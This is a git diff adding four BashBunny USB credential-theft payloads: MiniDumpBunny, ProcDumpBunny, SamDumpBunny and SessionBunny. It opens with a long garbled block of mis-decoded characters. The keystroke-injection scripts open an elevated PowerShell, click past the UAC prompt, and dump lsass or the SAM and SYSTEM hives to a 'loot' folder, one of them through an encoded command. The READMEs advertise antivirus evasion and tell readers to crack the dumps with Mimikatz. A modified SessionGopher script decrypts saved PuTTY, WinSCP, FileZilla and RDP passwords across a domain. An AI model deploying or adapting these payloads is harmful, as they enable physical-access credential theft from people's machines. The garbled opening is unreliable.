潰敷獲敨汬攮數ⴠ湥⁣䅊睂䡁䅉睢橂䝁䅕督穂䍁䅁児杁䕁䅣党あ䍁䄰䅕祂䝁䄸睙求䡁䅍督杁䝁䅷督桂䡁䅍督㝁䍁䅧杢求䡁䅣兌偂䝁䅉杓䙂䝁䅍䅖杁䍁䅁兓偂䍁䄴睑療䕁䄰䅕祂䝁䅕督穂䝁䅫睢畂䍁䄴䅒求䕁䅙䅢桂䡁䅑党穂䙁䅑杣䙂䕁䅅兔潁䙁䅳睕㕂䡁䅍䅖求䕁䄰杌灂䝁䄸杌瑂䕁䅕兔偂䡁䅉入穂䡁䅑杣求䝁䅅兢摂䙁䅳督婂䙁䅍䅖䙂䕁䄰杌橂䝁䄸杔㉂䕁䅕杣啂䙁䄰杏㙁䕁䅙杣偂䝁䄰杙桂䙁䅍兒㉁䑁䅑睕啂䡁䅉兡畂䝁䅣䅋杁䍁䅣来坂䙁䅙杕楂䑁䅫睢㍂䕁䅕䅓㍁䝁䄴杖ㅁ䡁䅣李䭂䕁䅉兓䭂䕁䅫睢硁䕁䄸党㉁䝁䅧兖桂䙁䅉䅍あ䕁䅣兎偂䝁䅣兒求䝁䄰睒佂䕁䅫兕硂䙁䅅䅎㍁䕁䅣兢祁䕁䄴䅓煂䝁䄸睒灂䡁䅅杤㕁䑁䅫兎㕂䙁䅅䅢䑂䝁䅅兒兂䑁䅙免㉁䙁䅣䅣癁䝁䅯䅏牁䝁䅉杤兂䑁䅕䅏㕁䝁䄴兑䩂䕁䅑兎䩂䕁䅅䅎䝂䝁䄰督㕁䝁䅍䅡獂䡁䅣睋偂䕁䄸李灂䙁䅉兖䥂䡁䅣兢塂䙁䅫䅥偂䕁䅳免塂䕁䄴杣䵂䝁䅙䅕䉂䡁䅕䅡剂䝁䅕睍ぁ䕁䅳兤塂䕁䅣睓㍂䝁䄰䅗㑁䕁䅷睎䉂䙁䅯䅎湂䝁䅙䅖兂䕁䅍兕䡂䙁䅅䅥塂䝁䄰兡浂䕁䅣党婂䕁䅫睎啂䕁䅕睍兂䙁䅯入桂䕁䅍兏煂䑁䅁䅏坂䑁䅙睒䍂䑁䅁杗呂䡁䅑䅒䵂䙁䅍杤佂䑁䅍兒㕂䑁䅕兑䩂䡁䅯兏䑂䙁䅣䅍癁䝁䅑䅢硁䕁䄴兤瑂䙁䅣睑あ䡁䅅来瑂䡁䅫䅢佂䡁䅯杚穁䝁䅣䅚㉂䝁䅳䅔坂䑁䅉杙潂䙁䅧兙噂䡁䅁䅥牂䡁䅕䅥㕁䑁䅣李湂䡁䅕䅚穂䝁䄴李䥂䙁䅍睑浂䙁䅣睢㍂䑁䅫督慂䕁䄰督湂䝁䅕兔噂䙁䅉杣㉂䝁䅅兢佂䙁䅕来䱂䡁䅧睙楂䑁䅁杗㍁䙁䅙䅔㉂䑁䅁杕瑂䡁䅕䅢睂䑁䅕睚療䝁䅉兖潂䕁䅑䅥㉁䑁䅁䅢瑂䕁䅉村睁䝁䅫杍乂䑁䅁睡剂䡁䅁䅖䱂䑁䅑杕灂䝁䅷杢ㅁ䕁䅍睖㑁䕁䅕睤啂䑁䅅䅔䕂䝁䅑䅔祂䙁䅅兢呂䝁䅯䅣楂䑁䅕兙䑂䡁䅉李睂䝁䅳兕㑁䕁䅕党䵂䕁䄰杔㑁䝁䅫兢あ䕁䅉睙硂䑁䅉睑療䡁䅍杣慂䑁䅅睓䱂䡁䅫杣湂䡁䅕村䩂䝁䅑杓坂䡁䅁免㍂䍁䅳兎睂䕁䅷杙療䡁䅍睤睁䕁䄴杍潂䍁䄸睑煂䕁䅣免ㅁ䕁䅙杗慂䍁䄸兤あ䑁䅁睒湂䡁䅑兓塂䙁䅍睎䑂䙁䅁睙䥂䕁䅳䅖啂䙁䅑睙䑂䕁䅑䅓䡂䙁䅣睔瑂䑁䅫杖浂䝁䅷兏䭂䕁䄰免ㅁ䝁䅙睤䥂䑁䅫睕穂䕁䅙兏祂䙁䅙兙婂䡁䅁兣乂䡁䅣睔ㅁ䕁䅙䅏ぁ䕁䅫睍䑂䕁䅉兢䍂䕁䅍䅥硂䝁䅧睑㍁䕁䅷睚䍂䍁䅳督療䝁䅳睒桂䑁䅁睓㕂䡁䅫兔佂䝁䄸䅔坂䕁䅉睤奂䝁䅯睖歂䡁䅅睢ㅁ䑁䅍䅕あ䡁䅫䅕䉂䡁䅁䅚䵂䑁䅑入啂䡁䅍李慂䝁䅍兤㍁䍁䄸睑卂䡁䅑䅏噂䝁䅷䅎噂䕁䅉兙㍂䙁䅫睎啂䝁䅷兖潂䡁䅍睕䝂䡁䅫杓ㅁ䕁䅷兏䵂䑁䅉睒䑂䡁䅕免ㅁ䡁䅕杔潂䝁䅯䅚求䡁䅕睖噂䝁䅍兎㕂䡁䅉睑癁䕁䄰睑乂䕁䅙兗潂䕁䅷兡ぁ䡁䅕村湂䙁䅅来塂䕁䅧䅗㉂䕁䅙杔偂䕁䄴兔䥂䝁䅉睌煂䙁䅯䅕㕂䙁䅉杢䱂䡁䅉杚硂䙁䅁䅖獂䝁䄴兕牂䙁䅧杚煂䝁䅳免䡂䡁䅙睖兂䙁䅯䅒㑁䑁䅅杖歂䙁䅣李硂䑁䅁兒ㅁ䙁䅫兙㕁䝁䅣睓穁䙁䅉䅒㉂䑁䅫杔睁䙁䅣杢㍁䡁䅙杗䝂䡁䅑䅖療䑁䅣免煂䝁䅅杗灂䍁䄸䅍呂䡁䅑睌潂䑁䅧睕硁䡁䅯免睂䕁䅯杍㑁䝁䅣杖䩂䡁䅁睔慂䙁䅯睓㉂䡁䅣党獂䕁䅯杗坂䑁䅙䅏噂䝁䅑睎啂䡁䅁兎硂䕁䄸兏穂䑁䅍条䑂䡁䅁睔灂䑁䅑免婂䡁䅍睔坂䕁䅉䅥療䝁䅫兕硁䕁䄸党穂䑁䅕兗歂䡁䅙杙求䝁䅙䅏䉂䝁䅙兗坂䝁䅧䅖䩂䝁䅅睚硁䝁䅷条橂䡁䅉兖兂䙁䅫睓牁䕁䅫兤偂䕁䅕䅚奂䑁䅣兣䭂䑁䅉兎歂䡁䅯睓浂䝁䅉䅕浂䕁䄸兎煂䙁䅍兒塂䑁䅑杕瑂䕁䄴䅥䕂䡁䅣兣灂䝁䅯兔灂䕁䅧杍穂䕁䅍杔畂䕁䅣兎剂䙁䅅杍祂䑁䅙免睂䝁䅧睓牂䕁䅧睚㕂䙁䅙村畂䡁䅧睡橂䙁䅕䅔祁䕁䅅杚婂䕁䅍来灂䕁䅕睎䵂䝁䅣兕穂䑁䅧睖奂䝁䅑兖剂䝁䄸兤㍂䙁䅕兕䩂䕁䅳兎婂䙁䅍兓灂䕁䅷兙㑁䑁䅍兎㉂䡁䅫兕穁䑁䅑兙療䝁䅍李灂䕁䅯䅒塂䑁䅁杢偂䕁䅍睓卂䝁䅫杖睁䡁䅯䅓ぁ䍁䅳睑䝂䕁䅑杓䙂䙁䅣杢硂䙁䅉䅓瑂䝁䅫杢穂䝁䅯党灂䝁䅫兙兂䝁䅅睔奂䡁䅙兕ㅁ䙁䅧睖楂䡁䅕睒湂䕁䅯杕䵂䕁䅫睌婂䕁䅑杓求䝁䄰䅣祁䕁䅣村㕁䑁䅣入楂䙁䅍兙あ䝁䅍督㍁䙁䅅䅓㙂䝁䅙䅕潂䕁䅑睡求䕁䅫杣慂䑁䅁督佂䡁䅙䅒求䕁䅫兤䉂䝁䅧䅕㕂䡁䅅䅢㍂䡁䅑杚ぁ䕁䅅睊杁䍁䅫䅉獁䙁䅳督㕂䙁䅍䅤求䝁䄰杌䩂䕁䄸杌䑂䕁䄸兢兂䙁䅉党呂䙁䅍兡偂䝁䄴杌橂䝁䄸兢睂䡁䅉兒呂䙁䅍兡偂䕁䄴兔療䕁䅑兒摂䑁䅯杏䕂䝁䅕睑偂䕁䄰䅣祂䝁䅕督呂䍁䅁克㡂䍁䅁杚偂䙁䅉兒桂䝁䅍䅡杁䡁䅳䅉畂䝁䅕睤瑁䕁䄸杙䭂䕁䅕睙啂䍁䅁䅉䩂䝁䄸杌穂䙁䅑杕求䕁䅅兔卂䝁䅕兑歂䝁䅕杕潁䍁䅑睘杁䍁䅷睗穂䡁䅫睕啂䝁䅕兢畁䡁䅑兒㑂䙁䅑杌求䝁䄴睑療䕁䅑兓畂䝁䅣兘㙁䑁䅯兙呂䕁䅍兓䩂䍁䅁克杁䡁䄰克畁䙁䅉兒䉂䕁䅑䅤療䕁䅕杢歂䍁䅧䅉灁䡁䅷兡畂䡁䅙睢䱂䕁䅕兌求䡁䅧䅣卂䕁䅕睕呂䝁䅫睢佂䅁㴽

17
payloads/library/credentials/MiniDumpBunny/README.md Normal file
View File

@ -0,0 +1,17 @@
**Title: MiniDumpBunny**
Author: 0i41E
Version: 1.0
What is MiniDumpBunny?
#
*MiniDumpBunny uses Powersploits Out-MiniDump script to dump lsass. The script was rewritten, adapted for BashBunny usage and obfuscated in multiple ways to evade Antivirus.*
#
**Instruction:**
Plug in your BashBunny equipped with the obfuscated MiniBunny.bat file, wait a few seconds, go away.
#
Exfiltrate the .dmp file and read it with Mimikatz.
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/MiniDumpBunny/mimi.png)

BIN
payloads/library/credentials/MiniDumpBunny/mimi.png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 60 KiB

43
payloads/library/credentials/MiniDumpBunny/payload.txt Normal file
View File

@ -0,0 +1,43 @@
#!/bin/bash
#
# Title: MiniDumpBunny
# Description: Dump lsass with this script, which was obfuscated with multiple layers.
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\MiniBunny.bat')"
Q DELAY 250
Q STRING " ;mv *.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
Q DELAY 250
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH

21
payloads/library/credentials/ProcDumpBunny/README.md Normal file
View File

@ -0,0 +1,21 @@
**Title: ProcDumpBunny**
Author: 0i41E
Version: 1.0
What is ProcDumpBunny?
#
*It is simple - using a renamed version of procdump - you are able to dump hashes from lsass.exe*
#
**Instruction:**
Download ProcDump from Microsoft - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump - rename the Executeable to Bunny.exe
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(38).png)
Place Bunny.exe in the same payload switch as your payload
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(37).png)
#
Plug in BashBunny.
Exfiltrate the out.dmp file and read it with Mimikatz.
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/ProcDumpBunny/Screenshot%20(39).png)

BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (37).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 8.7 KiB

BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (38).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 78 KiB

BIN
payloads/library/credentials/ProcDumpBunny/Screenshot (39).png Normal file
View File

Binary file not shown.
Side by Side

After

Width:  |  Height:  |  Size: 61 KiB

45
payloads/library/credentials/ProcDumpBunny/payload.txt Normal file
View File

@ -0,0 +1,45 @@
#!/bin/bash
#
# Title: ProcDumpBunny
# Description: Dump lsass.exe with a renamed version of procdump
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
#After you have adapted the delays for your target, add "-W hidden"
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
#Depending on your language - you need to change this - english layout: "Q ALT y" for example
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\Bunny.exe -ma lsass.exe out.dmp')"
Q DELAY 250
Q STRING " ;mv out.dmp ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';(New-Object -comObject Shell.Application).Nam"
Q DELAY 250
Q STRING "espace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH

24
payloads/library/credentials/SamDumpBunny/README.md Normal file
View File

@ -0,0 +1,24 @@
**Title: SamDumpBunny**
<p>Author: 0i41E<br>
OS: Windows<br>
Version: 1.0<br>
**What is SamDumpBunny?**
#
<p>SamDumpBunny dumps the users sam and system hive and compresses them into a zip file.<br>
Afterwards you can use a tool like samdump2 to extract the users hashes.</p>
**Instruction:**
1. Plug in your Bashbunny and wait a few seconds
2. Unzip the exfiltrated zip file onto your machine.
3. Use a tool like samdump2 or pypykatz on your machine to extract the users hashes.
> `samdump2 BunnySys BunnySam`
or `pypykatz registry BunnySys --sam BunnySam`
**!Disclaimer! samdump2 has proven to be unreliable in the recent past.**
![alt text](https://github.com/0i41E/omg-payloads/blob/master/payloads/library/credentials/SamDumpCable/sam.png)

53
payloads/library/credentials/SamDumpBunny/payload.txt Normal file
View File

@ -0,0 +1,53 @@
#!/bin/bash
#
# Title: SamDumpBunny
# Description: Dump users sam and system hive and exfiltrate them. Afterwards you can use a tool like samdump2, to get the users hashes.
# Author: 0i41E
# Version: 1.0
# Category: Credentials
# Attackmodes: HID, Storage
LED SETUP
Q DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
Q DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
Q DELAY 1000
RUN WIN "powershell Start-Process powershell -Verb runAs"
Q ENTER
Q DELAY 1000
#Shortcut for pressing yes - Needs to be adapted for your language (ger=ALT j;engl=ALT y; etc...)
Q ALT j
Q DELAY 250
Q DELAY 250
Q STRING "powershell.exe -NoP -enc cgBlAGcAIABzAGEAdgBlACAAaABrAGwAbQBcAHMAYQBtACAAQgB1AG4AbgB5AFMAYQBtADsAcgBlAGcAIABzAGEAdgBlAC"
Q DELAY 250
Q STRING "AAaABrAGwAbQBcAHMAeQBzAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAQwBvAG0AcAByAGUAcwBzAC0AQQByAGMAaABpAHYAZQAgAC0AUABhAHQAaAAgA"
Q DELAY 250
Q STRING "CIAJABQAFcARABcAEIAdQBuAG4AeQBTAHkAcwAiACwAIAAiACQAUABXAEQAXABCAHUAbgBuAHkAUwBhAG0AIgAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBu"
Q DELAY 250
Q STRING "AFAAYQB0AGgAIABTAGEAbQBEAHUAbQBwAEIAdQBuAG4AeQAuAHoAaQBwADsAcgBlAG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAeQBzADsAcgBl"
Q DELAY 250
Q STRING "AG0AbwB2AGUALQBpAHQAZQBtACAAQgB1AG4AbgB5AFMAYQBtADsAZQB4AGkAdAA="
Q DELAY 250
Q STRING ";mv SamDumpBunny.zip ((gwmi win32_volume -f 'label=''BashBunny''').Name+'\loot');\$bb = (gwmi win32_volume -f 'l"
Q DELAY 250
Q STRING "abel=''BashBunny''').Name;Start-Sleep 1;New-Item -ItemType file \$bb'DONE';Start-Sleep 3;(New-Object -comObject Shel"
Q DELAY 250
Q STRING "l.Application).Namespace(17).ParseName(\$bb).InvokeVerb('Eject');Start-Sleep -s 5;Exit"
Q DELAY 300
Q ENTER
LED FINISH

22
payloads/library/credentials/SessionBunny/README.md Normal file
View File

@ -0,0 +1,22 @@
**Title: SessionBunny**
Author: 0i41E
(Credit for SessionGopher: Brandon Arvanaghi)
Version: 1.0
**Instruction:**
This payload will run the famous SessionGopher script, which was only slightly modified. Searches for PuTTY, WinSCP, and Remote Desktop saved sessions, decrypts saved passwords for WinSCP,
Extracts FileZilla, SuperPuTTY's saved session information in the sitemanager.xml file and decodes saved passwords.
After you recieve the information, save the items you are interested in simply on your BashBunny.
#
**Instruction:**
Place SessionBunny.ps1 in the same payload switch-folder as your payload.txt
#
Plug in BashBunny.
Wait for the script to finish and decide what you wanna do with the information gathered
![alt text](https://github.com/0i41E/bashbunny-payloads/blob/master/payloads/library/credentials/SessionBunny/censorepic.png)

948
payloads/library/credentials/SessionBunny/SessionBunny.ps1 Normal file
View File

@ -0,0 +1,948 @@
function Invoke-SessionBunny
{
#>
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $False)]
[String]
$Computername,
[Parameter(Position= 1 , Mandatory = $False)]
[String]
$Credential,
[Parameter(Position= 2 , Mandatory = $False)]
[Alias("iL")]
[String]
$Inputlist,
[Parameter(Position = 3, Mandatory = $False)]
[Switch]
$AllDomain,
[Parameter(Position = 4, Mandatory = $False)]
[Switch]
$Everything,
[Parameter(Position = 5, Mandatory = $False)]
[Switch]
$ExcludeDC,
[Parameter(Position = 6, Mandatory = $False)]
[Switch]
[Alias("o")]
$OutCSV,
[Parameter(Position=8, Mandatory = $False)]
[String]
$OutputDirectory = "$pwd\SessionGopher-" + (Get-Date -Format o | foreach {$_ -replace ":", "."})
)
Write-Output '
o
o
o_
/ ". SessionGopher
," _-" Bunny Edition (0i41E)
," m m
..+ ) Brandon Arvanaghi
`m..m @arvanaghi | arvanaghi.com
'
$ErrorActionPreference = "SilentlyContinue"
#clear error listing
$Error.clear()
if ($OutCSV) {
Write-Verbose "Creating directory $OutputDirectory."
New-Item -ItemType Directory $OutputDirectory | Out-Null
New-Item ($OutputDirectory + "\PuTTY.csv") -Type File | Out-Null
New-Item ($OutputDirectory + "\SuperPuTTY.csv") -Type File | Out-Null
New-Item ($OutputDirectory + "\WinSCP.csv") -Type File | Out-Null
New-Item ($OutputDirectory + "\FileZilla.csv") -Type File | Out-Null
New-Item ($OutputDirectory + "\RDP.csv") -Type File | Out-Null
if ($Everything) {
New-Item ($OutputDirectory + "\PuTTY ppk Files.csv") -Type File | Out-Null
New-Item ($OutputDirectory + "\Microsoft rdp Files.csv") -Type File | Out-Null
New-Item ($OutputDirectory + "\RSA sdtid Files.csv") -Type File | Out-Null
}
}
if ($Credential) {
$Credentials = Get-Credential -Credential $Credential
}
# Value for HKEY_USERS hive
$HKU = 2147483651
# Value for HKEY_LOCAL_MACHINE hive
$HKLM = 2147483650
$PuTTYPathEnding = "\SOFTWARE\SimonTatham\PuTTY\Sessions"
$WinSCPPathEnding = "\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
$RDPPathEnding = "\SOFTWARE\Microsoft\Terminal Server Client\Servers"
if ($Inputlist -or $AllDomain -or $ComputerName) {
# Whether we read from an input file or query active directory
$Reader = ""
if ($AllDomain) {
Write-Verbose "Getting member computers in the domain."
$Reader = GetComputersFromActiveDirectory
} elseif ($Inputlist) {
Write-Verbose "Reading the list of targets."
$Reader = Get-Content ((Resolve-Path $Inputlist).Path)
} elseif ($ComputerName) {
Write-Verbose "Setting target computer as $ComputerName."
$Reader = $ComputerName
}
$optionalCreds = @{}
if ($Credentials) {
$optionalCreds['Credential'] = $Credentials
}
foreach ($RemoteComputer in $Reader) {
if ($AllDomain) {
# Extract just the name from the System.DirectoryServices.SearchResult object
$RemoteComputer = $RemoteComputer.Properties.name
}
if ($RemoteComputer) {
Write-Output "Digging on" $RemoteComputer"..."
$SIDS = Invoke-WmiMethod -Class 'StdRegProv' -Name 'EnumKey' -ArgumentList $HKU,'' -ComputerName $RemoteComputer @optionalCreds | Select-Object -ExpandProperty sNames | Where-Object {$_ -match 'S-1-5-21-[\d\-]+$'}
foreach ($SID in $SIDs) {
# Get the username for SID we discovered has saved sessions
$MappedUserName = try { (Split-Path -Leaf (Split-Path -Leaf (GetMappedSID))) } catch {}
$Source = (($RemoteComputer + "\" + $MappedUserName) -Join "")
# Created for each user found. Contains all sessions information for that user.
$UserObject = New-Object PSObject
<#
PuTTY: contains hostname and usernames
SuperPuTTY: contains username, hostname, relevant protocol information, decrypted passwords if stored
RDP: contains hostname and username of sessions
FileZilla: hostname, username, relevant protocol information, decoded passwords if stored
WinSCP: contains hostname, username, protocol, deobfuscated password if stored and no master password used
#>
$ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList
$ArrayOfSuperPuTTYSessions = New-Object System.Collections.ArrayList
$ArrayOfRDPSessions = New-Object System.Collections.ArrayList
$ArrayOfFileZillaSessions = New-Object System.Collections.ArrayList
$ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList
# Construct tool registry/filesystem paths from SID or username
$RDPPath = $SID + $RDPPathEnding
$PuTTYPath = $SID + $PuTTYPathEnding
$WinSCPPath = $SID + $WinSCPPathEnding
$SuperPuTTYFilter = "Drive='C:' AND Path='\\Users\\$MappedUserName\\Documents\\SuperPuTTY\\' AND FileName='Sessions' AND Extension='XML'"
$FileZillaFilter = "Drive='C:' AND Path='\\Users\\$MappedUserName\\AppData\\Roaming\\FileZilla\\' AND FileName='sitemanager' AND Extension='XML'"
$RDPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$RDPPath @optionalCreds
$PuTTYSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$PuTTYPath @optionalCreds
$WinSCPSessions = Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name EnumKey -ArgumentList $HKU,$WinSCPPath @optionalCreds
$SuperPuTTYPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $SuperPuTTYFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)
$FileZillaPath = (Get-WmiObject -Class 'CIM_DataFile' -Filter $FileZillaFilter -ComputerName $RemoteComputer @optionalCreds | Select Name)
# If any WinSCP saved sessions exist on this box...
if (($WinSCPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
Write-Verbose "Found saved WinSCP sessions."
# Get all sessions
$WinSCPSessions = $WinSCPSessions | Select-Object -ExpandProperty sNames
foreach ($WinSCPSession in $WinSCPSessions) {
$WinSCPSessionObject = "" | Select-Object -Property Source,Session,Hostname,Username,Password
$WinSCPSessionObject.Source = $Source
$WinSCPSessionObject.Session = $WinSCPSession
$Location = $WinSCPPath + "\" + $WinSCPSession
$WinSCPSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"HostName" @optionalCreds).sValue
$WinSCPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"UserName" @optionalCreds).sValue
$WinSCPSessionObject.Password = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"Password" @optionalCreds).sValue
if ($WinSCPSessionObject.Password) {
$MasterPassPath = $SID + "\Software\Martin Prikryl\WinSCP 2\Configuration\Security"
$MasterPassUsed = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetDWordValue -ArgumentList $HKU,$MasterPassPath,"UseMasterPassword" @optionalCreds).uValue
if (!$MasterPassUsed) {
$WinSCPSessionObject.Password = (DecryptWinSCPPassword $WinSCPSessionObject.Hostname $WinSCPSessionObject.Username $WinSCPSessionObject.Password)
} else {
$WinSCPSessionObject.Password = "Saved in session, but master password prevents plaintext recovery"
}
}
[void]$ArrayOfWinSCPSessions.Add($WinSCPSessionObject)
} # For Each WinSCP Session
if ($ArrayOfWinSCPSessions.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "WinSCP Sessions" -Value $ArrayOfWinSCPSessions
if ($OutCSV) {
$ArrayOfWinSCPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\WinSCP.csv") -NoTypeInformation
} else {
Write-Output "WinSCP Sessions"
$ArrayOfWinSCPSessions | Select-Object * | Format-List | Out-String
}
}
} # If path to WinSCP exists
if (($PuTTYSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
Write-Verbose "Found saved PuTTY sessions."
# Get all sessions
$PuTTYSessions = $PuTTYSessions | Select-Object -ExpandProperty sNames
foreach ($PuTTYSession in $PuTTYSessions) {
$PuTTYSessionObject = "" | Select-Object -Property Source,Session,Hostname
$Location = $PuTTYPath + "\" + $PuTTYSession
$PuTTYSessionObject.Source = $Source
$PuTTYSessionObject.Session = $PuTTYSession
$PuTTYSessionObject.Hostname = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"HostName" @optionalCreds).sValue
[void]$ArrayOfPuTTYSessions.Add($PuTTYSessionObject)
}
if ($ArrayOfPuTTYSessions.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "PuTTY Sessions" -Value $ArrayOfPuTTYSessions
if ($OutCSV) {
$ArrayOfPuTTYSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\PuTTY.csv") -NoTypeInformation
} else {
Write-Output "PuTTY Sessions"
$ArrayOfPuTTYSessions | Select-Object * | Format-List | Out-String
}
}
} # If PuTTY session exists
if (($RDPSessions | Select-Object -ExpandPropert ReturnValue) -eq 0) {
Write-Verbose "Found saved RDP sessions."
# Get all sessions
$RDPSessions = $RDPSessions | Select-Object -ExpandProperty sNames
foreach ($RDPSession in $RDPSessions) {
$RDPSessionObject = "" | Select-Object -Property Source,Hostname,Username
$Location = $RDPPath + "\" + $RDPSession
$RDPSessionObject.Source = $Source
$RDPSessionObject.Hostname = $RDPSession
$RDPSessionObject.Username = (Invoke-WmiMethod -ComputerName $RemoteComputer -Class 'StdRegProv' -Name GetStringValue -ArgumentList $HKU,$Location,"UserNameHint" @optionalCreds).sValue
[void]$ArrayOfRDPSessions.Add($RDPSessionObject)
}
if ($ArrayOfRDPSessions.count -gt 0) {
$UserObject | Add-Member -MemberType NoteProperty -Name "RDP Sessions" -Value $ArrayOfRDPSessions
if ($OutCSV) {
$ArrayOfRDPSessions | Select-Object * | Export-CSV -Append -Path ($OutputDirectory + "\RDP.csv") -NoTypeInformation
} else {
Write-Output "Microsoft RDP Sessions"
$ArrayOfRDPSessions | Select-Object * | Format-List | Out-String
}
}
} # If RDP sessions exist
# If we find the SuperPuTTY Sessions.xml file where we would expect it
if ($SuperPuTTYPath.Name) {
Write-Verbose "Found SupePuTTY sessions.xml"
$File = "C:\Users\$MappedUserName\Documents\SuperPuTTY\Sessions.xml"
$FileContents = DownloadAndExtractFromRemoteRegistry $File
[xml]$SuperPuTTYXML = $FileContents
(ProcessSuperPuTTYFile $SuperPuTTYXML)
}
# If we find the FileZilla sitemanager.xml file where we would expect it
if ($FileZillaPath.Name) {
Write-Verbose "Found FileZilaa sitemanager.xml"
$File = "C:\Users\$MappedUserName\AppData\Roaming\FileZilla\sitemanager.xml"
$FileContents = DownloadAndExtractFromRemoteRegistry $File
[xml]$FileZillaXML = $FileContents
(ProcessFileZillaFile $FileZillaXML)
} # FileZilla
} # for each SID
if ($Everything) {
Write-Verbose "Running the every test. Reading files on the target machine. This may take few minutes."
$ArrayofPPKFiles = New-Object System.Collections.ArrayList
$ArrayofRDPFiles = New-Object System.Collections.ArrayList
$ArrayofsdtidFiles = New-Object System.Collections.ArrayList
$FilePathsFound = (Get-WmiObject -Class 'CIM_DataFile' -Filter "Drive='C:' AND extension='ppk' OR extension='rdp' OR extension='.sdtid'" -ComputerName $RemoteComputer @optionalCreds | Select Name)
(ProcessThoroughRemote $FilePathsFound)
}
# Check if the error is access denied.
$ourerror = $error[0]
if ($ourerror.Exception.Message.Contains("Access is denied.")) {
Write-Warning "Access Denied on $RemoteComputer"
} elseif ($ourerror.Exception.Message.Contains("The RPC server is unavailable.")) {
Write-Warning "Cannot connect to $RemoteComputer. Is the host up and accepting RPC connections?"
} else {
Write-Debug "$($ourerror.Exception.Message)"
}
}
}# for each remote computer
# Else, we run SessionGopher locally
} else {
Write-Output "Digging on"(Hostname)"..."
# Aggregate all user hives in HKEY_USERS into a variable
$UserHives = Get-ChildItem Registry::HKEY_USERS\ -ErrorAction SilentlyContinue | Where-Object {$_.Name -match '^HKEY_USERS\\S-1-5-21-[\d\-]+$'}
# For each SID beginning in S-15-21-. Loops through each user hive in HKEY_USERS.
foreach($Hive in $UserHives) {
# Created for each user found. Contains all PuTTY, WinSCP, FileZilla, RDP information.
$UserObject = New-Object PSObject
$ArrayOfWinSCPSessions = New-Object System.Collections.ArrayList
$ArrayOfPuTTYSessions = New-Object System.Collections.ArrayList
$ArrayOfPPKFiles = New-Object System.Collections.ArrayList
